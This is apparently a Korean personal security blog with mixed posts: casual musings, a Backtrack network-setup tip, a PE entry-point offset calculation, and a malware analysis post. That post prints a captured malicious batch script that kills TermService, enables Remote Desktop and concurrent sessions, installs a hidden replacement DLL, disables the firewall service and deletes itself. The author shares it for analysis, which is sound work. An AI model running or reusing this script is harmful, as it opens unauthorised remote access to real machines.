CreateMutex
까보면 다나와~
분류 전체보기 (216)

푸른색과 흰색

푸른색과 흰색이 같이 있는게 좋다.

마치 파란하늘에 흰구름이 뭉개뭉개 피어있는 모습이랄까

(이게 왠..)

'아리스리생각' 카테고리의 다른 글

국정원 채용공고  (0) 2010.08.20
360도 파노라마 사진  (0) 2010.07.21
서로에게 관심 갖기.  (0) 2010.07.12
사회 공학적 기법의 해킹.  (0) 2010.05.19
재미있는 MBC 드라마  (0) 2010.04.27
  Comments,     Trackbacks

Bat 파일로 쓰인 명령어
@echo off
for /f "tokens=2 delims= " %%a in ('tasklist/svc^|find ^"TermService^"') do (taskkill /pid %%a /f)
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
Attrib +H +S +R %systemroot%\system32\termsrvhack.dll
net stop sharedaccess
net start dcomlaunch
net start termservice
shutdown -a
del 3389.vbs
del 3389.bat

요놈은 삭제만 할 줄 알았더니 직접 서비스를 한다.
대충.. termsrv.dll 파일을 이용하여 외부와 통신을 하는 목적으로 판단된다.
뭐하는 명령인지 전부는 모르지만 혹시 몰라 남겨봄~
  Comments,     Trackbacks

Backtrack에서 GUI로 네트워크 설정하기 (Backtrack Network Configuration)

Backtrack에서 네트워크 설정시 터미널에서 수정하는 것보다 GUI가 쉽기 때문에 관련 정보를 찾아 올립니다. 저는 Vmware에서 Nat설정을 하고도 네트워크가 잡히지 않아서 이렇게 하고 GUI로 보니 DNS문제였내요..--; 아무튼 유용할거 같아서 스크린 샷 붙혀 보았습니다.

 

The file we’re looking for is /usr/share/slax/network-conf.kmdr. If you try to run network-conf.kmdr from a terminal, nothing happens and you get some errors. This is because this file requires the command kmdr-executor. So, to easily return the missing menu item to K Menu:

 

 

- Right click the K Menu button and choose Menu Editor.

 

 

- Expand Internet group.

 

- Right click Internet group, and select New Item.

 

 

- Name the new item Network Configurator, and the Command is:


kmdr-executor /usr/share/slax/network-conf.kmdr


 

 

- Choose an icon for the menu item

 

- Save the K Menu configuration.

 

 

- Enjoy.

 


  Comments,     Trackbacks

악성코드가 싫어하는 프로그램들

VM에서 동적 분석하는 데 모든 모니터링 툴이 꺼져버렸다.
분명 제대로 동작한 악성코드라 뭔 짓을 했는지 궁그해서 살짝 까봤더니
아래와 같은 스트링이 있었다.



이런 프로그램들이라면 제작자에게 인정받거나 사람들이 많이 사용한다는 반증.
안써본게 있다면 사용해 보시길.
  Comments,     Trackbacks

파일의 Entry Point 값을 파일 Offset값으로 구하는 방법

Offset 108 번째(Address of Entry Point)의 Data 값
빼기
Offset 1e4 번째(RVA)의 Data 값
더하기
Offset 1ec 번째(PointerToRawData)의 Data 값


이렇게 계산을 하면 RVA로 나오는 EP값이 아닌 파일 Offset의 주소값을 알 수 있다.
원리는 책 "시스템 실행파일의 구조와 원리"를 참고하면 이해하는 데 도움이 될 것이다.
악성코드 로더(loader)계열이 시스템 파일을 변조할 때 EP를 수정하기 위한 한 방법이다.
  Comments,     Trackbacks

재미있는 MBC 드라마

요즘 MBC 드라마가 재미있다. TV키면 MBC만 잘 나온다.
TV킬때 보기만 하는데 그래도 꽤 재밋는거 같다.

추천 - 동이, 개취

'아리스리생각' 카테고리의 다른 글

국정원 채용공고  (0) 2010.08.20
360도 파노라마 사진  (0) 2010.07.21
서로에게 관심 갖기.  (0) 2010.07.12
사회 공학적 기법의 해킹.  (0) 2010.05.19
푸른색과 흰색  (0) 2010.05.11
  Comments,     Trackbacks